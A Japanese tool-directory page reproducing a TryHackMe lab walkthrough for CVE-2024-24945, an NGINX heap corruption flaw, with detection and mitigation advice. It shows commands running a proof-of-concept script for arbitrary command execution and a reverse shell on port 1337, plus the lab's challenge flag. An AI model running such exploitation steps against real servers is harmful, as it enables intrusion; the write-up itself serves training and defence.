Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2024-24945-NGINX-RIFT---TryHackMe-Lab-Walkthrough — このラボは、NGINXに影響を与えるヒープ破損の脆弱性であるCVE-2024-24945の悪用を実証しています。目的は、メモリ破損がどのようにリモートコード実行(RCE)につながるかを理解し、悪用、検出、および緩和技術に関する実践的な経験を積むことでした。 | Kitploit
ツール/GitHubGitHub/benedictejepu/cve-2024-24945-nginx-rift---tryhackme-lab-walkthrough
脆弱性分析エクスプロイトウェブアプリケーション悪用CTFペネトレーションテスト学習と教育バイナリエクスプロイトラボと実践

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
GitHub
benedictejepu/cve-2024-24945-nginx-rift---tryhackme-lab-walkthrough

CVE-2024-24945-NGINX-RIFT---TryHackMe-Lab-Walkthrough

このラボは、NGINXに影響を与えるヒープ破損の脆弱性であるCVE-2024-24945の悪用を実証しています。目的は、メモリ破損がどのようにリモートコード実行(RCE)につながるかを理解し、悪用、検出、および緩和技術に関する実践的な経験を積むことでした。

リポジトリを見る
2ヶ月前未レビュー

CVE-2024-24945-NGINX-RIFT---TryHackMe-ラボウォークスルー

このラボは、CVE-2024-24945(NGINXに影響を与えるヒープ破損の脆弱性)の悪用を実演しています。 目的は、メモリ破損がどのようにリモートコード実行(RCE)につながるかを理解し、 悪用、検出、および緩和技術に関する実践的な経験を得ることでした。

目的

. 脆弱なNGINXサービスの確認 . 提供された概念実証(PoC)を使用して任意のコマンドを実行する . ターゲットコンテナ上でリバースシェルを取得する . チャレンジフラグを取得する . 検出と緩和戦略を理解する

ラボ環境

. プラットフォーム: TryHackMe . ターゲットサービス: NGINX RIFT . コンテナ化環境: Docker . エクスプロイトツール: poc.py . アクセス方法: VNC (Virtual Network Computing)

方法論

  1. サービス確認

  2. 脆弱なコンテナが実行中でアクセス可能であることを確認

  3. root@kitploit:~
    sudo docker ps
    curl -s http://127.0.0.1:19321/api/users/42
    

バックエンド OK

  1. リモートコード実行

提供されたPoCを実行して任意のコマンド実行を検証した。

root@kitploit:~
pytho3 poc.py --cmd 'echo hello from depthfirst > /tmp/pwned

正常な実行を確認:

root@kitploit:~
sudo docker exec nginx-rift-nginx-1
cat /tmp/pwned

出力: hello from depthfirst

リバースシェルアクセス

ターゲットコンテナ上にインタラクティブシェルを確立する。

root@kitploit:~
python3 poc.py --shell

Successful Connection:

[] listening for reverse shell on port 1337... [] connected. $

  1. フラグ取得

チャレンジフラグにアクセスした。

root@kitploit:~
cat /flag.txt

フラグ:

THM{18_y34r_%t4t3_m15m4tch_rip5_th3_h34p}

検出の機会

防御者は以下の方法で悪用の試みを特定できる:

. NGINXワーカーのクラッシュ . セグメンテーションフォールトイベント . 予期しない外部ネットワーク接続 . 疑わしいシェルプロセス (/bin/sh,bash) . 一時ディレクトリへの不正なファイル作成

緩和戦略

. パッチ適用済みのNGINXバージョンにアップグレードする。 . 最小権限の原則を適用する。 . 不要な外部ネットワークトラフィックを制限する 連続的なログ監視を実装する。 . コンテナセキュリティ制御とランタイム監視を使用する

重要なポイント

このラボでは以下の実践的な経験を得た:

. ヒープ破損の脆弱性の理解 . リモートコード実行の欠陥の悪用 . リバースシェルの確立 . ポストエクスプロイト検証の実行 . 侵害指標(IoC)と緩和技術の認識

免責事項

この演習は、教育および防御的なサイバーセキュリティトレーニング目的のみのために、管理されたTryHackMeラボ環境で実施されました。

著者: [Benedict Ejepu Amaechi] プラットフォーム: TryHackMe トピック: CVE-2024-24945 9NGINX RIFT0 悪用と防御 完了日: 2026年6月

ツールをダウンロード